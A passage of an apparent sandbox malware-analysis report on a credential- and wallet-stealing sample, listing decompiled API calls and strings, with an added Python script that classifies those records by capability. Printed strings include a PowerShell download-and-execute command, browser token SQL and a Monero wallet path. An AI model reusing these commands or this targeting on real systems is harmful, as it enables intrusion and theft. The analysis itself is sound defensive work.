                                 • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: the same 14 dump regions listed under the first Memory Dump Source entry above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: 2faf2d7e71e690e97b99da330024e7815e1d8f6fda5e77046e9d7664cdbdd126
                                • Instruction ID: c279d307341c546c139fcc1f9e2b5bf024ed3a76039cdaa74fec16845889a1ab
                                • Opcode Fuzzy Hash: 2faf2d7e71e690e97b99da330024e7815e1d8f6fda5e77046e9d7664cdbdd126
                                • Instruction Fuzzy Hash: F821E7B1950218ABDB64DB54DC85FE9B3B8FB88704F00C598E609A7180DF71AA85CFD5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009476A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009476AB
                                • RegOpenKeyExA.ADVAPI32(80000002,015AC438,00000000,00020119,00000000), ref: 009476DD
                                • RegQueryValueExA.ADVAPI32(00000000,015BF3F8,00000000,00000000,?,000000FF), ref: 009476FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00947708
                                Strings
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: the same 14 dump regions listed under the first Memory Dump Source entry above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: bede20ba15109c0659173b02a57f68f5196b292f9e2297d0bdc772ca0afbcee0
                                • Instruction ID: 5f9b5a8ebc127afed2614fbeef4c67ac4873f25543e51646a63307c4c752567f
                                • Opcode Fuzzy Hash: bede20ba15109c0659173b02a57f68f5196b292f9e2297d0bdc772ca0afbcee0
                                • Instruction Fuzzy Hash: 02014FB5A44208BBDB00DBE4DC59F6DB7BCEB88701F104454FA0897291EB7499448B52
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0094773B
                                • RegOpenKeyExA.ADVAPI32(80000002,015AC438,00000000,00020119,009476B9), ref: 0094775B
                                • RegQueryValueExA.ADVAPI32(009476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0094777A
                                • RegCloseKey.ADVAPI32(009476B9), ref: 00947784
                                Strings
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: the same 14 dump regions listed under the first Memory Dump Source entry above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 438eb817bceb6ba0e5b950d85feb736e8882bd4afd5d57c14059b01128c3c6ea
                                • Instruction ID: cd03750ae59f274a97928e6944c9052fb6d9e7488645c4408506e481f81d07bc
                                • Opcode Fuzzy Hash: 438eb817bceb6ba0e5b950d85feb736e8882bd4afd5d57c14059b01128c3c6ea
                                • Instruction Fuzzy Hash: FF0117F5A40308BBD750DFE4DC49FAEB7B8EB84705F104555FA09A72C1DB705A408B52
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                • LocalFree.KERNEL32(0093148F), ref: 00939A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: the same 14 dump regions listed under the first Memory Dump Source entry above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: 61e133aef6c726cb3e149aa5816c1413b27bce4d24682f699fd871cfa03f35b6
                                • Instruction ID: 274620ba0bfc716ec1011ac9a8704f8d4a342d41135a41948a8dbe0cc225881f
                                • Opcode Fuzzy Hash: 61e133aef6c726cb3e149aa5816c1413b27bce4d24682f699fd871cfa03f35b6
                                • Instruction Fuzzy Hash: 74311C74A00209EFDF14DF94D985FAE77B9FF88341F108258E915A7290DB74AA81CFA1
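                                 The function records in this section are the raw material an analyst turns into behaviour tags: the WinINet download routine, the GlobalMemoryStatusEx call formatted with "%d MB", the CurrentBuildNumber / "Windows 11" registry queries, the ExitProcess$DefaultLangUser chain that the report flags as a locale-gated evasion, and the StrStrA("AccountId") / "SELECT service, encrypted_token FROM token_service" / "\Monero\wallet.keys" strings of the credential and wallet grabber. The following Python is an added example, not part of the Joe Sandbox report or of the Stealc sample: it parses the report's own "APIs" bullet format (plain calls, "Part of subcall function" lines, and calls without an argument list) together with the "API ID" and "String ID" fields, then applies a few rules that map call chains plus string arguments to capability labels. The embedded excerpt is copied from the records above, trimmed to the lines the parser consumes; the labels are an editorial interpretation, not Joe Sandbox signatures, and the parser assumes a "$" never occurs inside a single string of the String ID field.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Bullet lines of a Joe Sandbox "APIs" list, in the three shapes this report uses:
#   • StrStrA.SHLWAPI(00000000,AccountId), ref: 0093BCCD
#   • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,\Monero\wallet.keys), ref: 0094A9C5
#   • wsprintfA.USER32 ref: 009481AC            (no argument list)
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-F]{8}))?\s*$")
# The two "Similarity" fields reused here: "• API ID: a$b" and "• String ID: s1$s2" ($-separated).
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID):\s*(?P<val>.*)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str
    subcall_of: str | None  # callee address for "Part of subcall function" lines

@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    api_id_tokens: set[str] = field(default_factory=set)  # fallback when the APIs list is empty
    strings: list[str] = field(default_factory=list)

    def api_names(self) -> set[str]:
        return {c.name for c in self.calls} | self.api_id_tokens

    def searchable_text(self) -> str:
        # String-ID entries plus every resolved argument (paths, value names, SQL)
        return "\n".join(self.strings + [a for c in self.calls for a in c.args])

def parse_report(text: str) -> list[FunctionRecord]:
    """Every "APIs" heading opens a new function record; bullets are parsed until the next one."""
    records: list[FunctionRecord] = []
    current: FunctionRecord | None = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
        elif current is None:
            continue
        elif (m := API_LINE.match(line)):
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            current.calls.append(ApiCall(m["name"], m["module"], args, m["ref"] or "", m["sub"]))
        elif (f := FIELD_LINE.match(line)) and f["key"] == "API ID":
            current.api_id_tokens = {t for t in f["val"].split("$") if t}
        elif f:
            current.strings = [s for s in f["val"].split("$") if s]
    return records

# (label, API names that must all be present, strings of which at least one must appear)
RULES = [
    ("downloader: URL fetched with WinINet into a heap buffer",
     {"InternetOpenUrlA", "InternetReadFile"}, ()),
    ("host profiling: RAM size formatted as '%d MB'",
     {"GlobalMemoryStatusEx"}, ("%d MB",)),
    ("OS fingerprint: build number read from the registry",
     {"RegQueryValueExA"}, ("CurrentBuildNumber", "Windows 11")),
    ("evasion: user locale checked before a possible ExitProcess",
     {"ExitProcess", "DefaultLangUser"}, ()),
    ("theft: browser token_service rows and crypto-wallet files",
     set(), ("token_service", "wallet.keys", "AccountTokens")),
]

def classify(rec: FunctionRecord) -> list[str]:
    names, text = rec.api_names(), rec.searchable_text()
    return [label for label, need, any_of in RULES
            if need <= names and (not any_of or any(s in text for s in any_of))]

def classify_report(text: str) -> list[list[str]]:
    return [classify(r) for r in parse_report(text)]

# Excerpt copied from the function records above, trimmed to the lines the parser consumes.
REPORT_EXCERPT = r"""
APIs
  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
• StrStrA.SHLWAPI(00000000,AccountId), ref: 0093BCCD
• API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
• String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
APIs
• API ID: ExitProcess$DefaultLangUser
• String ID: *
APIs
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00935011
• InternetReadFile.WININET(?,?,00000400,00000000), ref: 00935041
• String ID:
APIs
• GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00948158
• wsprintfA.USER32 ref: 009481AC
• String ID: %d MB$@
APIs
• RegQueryValueExA.ADVAPI32(009476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0094777A
• String ID: CurrentBuildNumber
"""
```

                                 Running classify_report(REPORT_EXCERPT) yields one label per record in the order above. The API ID tokens are only a fallback: Joe Sandbox builds that field from word fragments of the API names, so a record whose APIs list is collapsed (the ExitProcess$DefaultLangUser one here) still gets matched, while fully listed records match on the real call names and on the resolved string arguments.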
                                APIs
                                • lstrcat.KERNEL32(?,015BF638), ref: 009447DB
                                  • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00944801
                                • lstrcat.KERNEL32(?,?), ref: 00944820
                                • lstrcat.KERNEL32(?,?), ref: 00944834
                                • lstrcat.KERNEL32(?,015AB720), ref: 00944847
                                • lstrcat.KERNEL32(?,?), ref: 0094485B
                                • lstrcat.KERNEL32(?,015BE950), ref: 0094486F
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 00948D90: GetFileAttributesA.KERNEL32(00000000,?,00931B54,?,?,0095564C,?,?,00950E1F), ref: 00948D9F
                                  • Part of subcall function 00944570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00944580
                                  • Part of subcall function 00944570: RtlAllocateHeap.NTDLL(00000000), ref: 00944587
                                  • Part of subcall function 00944570: wsprintfA.USER32 ref: 009445A6
                                  • Part of subcall function 00944570: FindFirstFileA.KERNEL32(?,?), ref: 009445BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: 548bf943f05bc5fae1c7e23359e6d5baa8b413087c674ad3490840a6dc1ac4af
                                • Instruction ID: 0a887099ca7be99f67b51fd8c85a6fc515f32f1c9d7e78b7e67f409850345b10
                                • Opcode Fuzzy Hash: 548bf943f05bc5fae1c7e23359e6d5baa8b413087c674ad3490840a6dc1ac4af
                                • Instruction Fuzzy Hash: 6D3141B290021867CB54FBB0DC85FEE737CAB98700F404989F35996191EE74A7C98B96
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00942D85
                                Strings
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00942D04
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00942CC4
                                • ')", xrefs: 00942CB3
                                • <, xrefs: 00942D39
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: c4eaab5251fd0dacf35a727a29254fbddacee558d975840e670c42eafe30329f
                                • Instruction ID: 8e3bdcb1562a49851e8f7ded10a43564eff67b3c59771b9d607be2e5fad8b45e
                                • Opcode Fuzzy Hash: c4eaab5251fd0dacf35a727a29254fbddacee558d975840e670c42eafe30329f
                                • Instruction Fuzzy Hash: 9941CA71C502089AEB14EBA0C892FEDBB78BF94304F504119F416A7192EF746A4ACF96
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00939F41
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: a56b14cf1c7bfd0ef21c35db7af8512d8ce6544157e67d024e73f3f5a1937038
                                • Instruction ID: 715416a159a387f8acac837a5d32f50f93649a2177a3235c04ed3bea4c54866d
                                • Opcode Fuzzy Hash: a56b14cf1c7bfd0ef21c35db7af8512d8ce6544157e67d024e73f3f5a1937038
                                • Instruction Fuzzy Hash: DB612D71A50248ABDB28EFA4CC96FED7775AF85304F008518F90A5B291EB746A05CF52
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,015BE850,00000000,00020119,?), ref: 009440F4
                                • RegQueryValueExA.ADVAPI32(?,015BF710,00000000,00000000,00000000,000000FF), ref: 00944118
                                • RegCloseKey.ADVAPI32(?), ref: 00944122
                                • lstrcat.KERNEL32(?,00000000), ref: 00944147
                                • lstrcat.KERNEL32(?,015BF758), ref: 0094415B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: d64c9dbf844afd8fec059324f6f6724c75fe3623eac015c632c02d6f92831208
                                • Instruction ID: 082814f6d9aceca3869486122b8837fef2b73a26c9e860e243b01101ecd16051
                                • Opcode Fuzzy Hash: d64c9dbf844afd8fec059324f6f6724c75fe3623eac015c632c02d6f92831208
                                • Instruction Fuzzy Hash: B84136B69101086BDB14FBA0DC56FFE737DABC8300F408958B61A97191EE755BC88B92
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 0094696C
                                • sscanf.NTDLL ref: 00946999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009469B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009469C0
                                • ExitProcess.KERNEL32 ref: 009469DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: 90556541c18bcc4e00ab5846a8862590d30c01e675ec810e49d8745d3099aed4
                                • Instruction ID: 1a33a7592e363b96728b3b579c205a8d2b6f067eb85f8be201709affaeb25968
                                • Opcode Fuzzy Hash: 90556541c18bcc4e00ab5846a8862590d30c01e675ec810e49d8745d3099aed4
                                • Instruction Fuzzy Hash: A721EDB5D14208ABCF44EFE4D945AEEB7B9FF88300F04452EE40AE3250EB345605CB66
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00947E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,015AC4E0,00000000,00020119,?), ref: 00947E5E
                                • RegQueryValueExA.ADVAPI32(?,015BE8B0,00000000,00000000,000000FF,000000FF), ref: 00947E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00947E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 0094cd8be22f880ee20b2101ae6d5c608075f3914c60c5d05ae487811259668d
                                • Instruction ID: 0a4364deea0058c03ef07c25006cb45593646a869f9e85812f7d82d2b35225f8
                                • Opcode Fuzzy Hash: 0094cd8be22f880ee20b2101ae6d5c608075f3914c60c5d05ae487811259668d
                                • Instruction Fuzzy Hash: 59118FB1A44209EBD714CFD4DC49F7FBBB8EB84701F104259F609A7290DB7459008BA2
                                APIs
                                • StrStrA.SHLWAPI(015BF530,?,?,?,0094140C,?,015BF530,00000000), ref: 0094926C
                                • lstrcpyn.KERNEL32(00B7AB88,015BF530,015BF530,?,0094140C,?,015BF530), ref: 00949290
                                • lstrlen.KERNEL32(?,?,0094140C,?,015BF530), ref: 009492A7
                                • wsprintfA.USER32 ref: 009492C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: c2f8e0a0e9068323b57844ee1236f2fa0826e3fda0a1ea4e6fbd2866c4c983f1
                                • Instruction ID: 5d1e7e5132ddff1c5b8a85b43fc11de4dad9db2425c51411496f0d2f239454a6
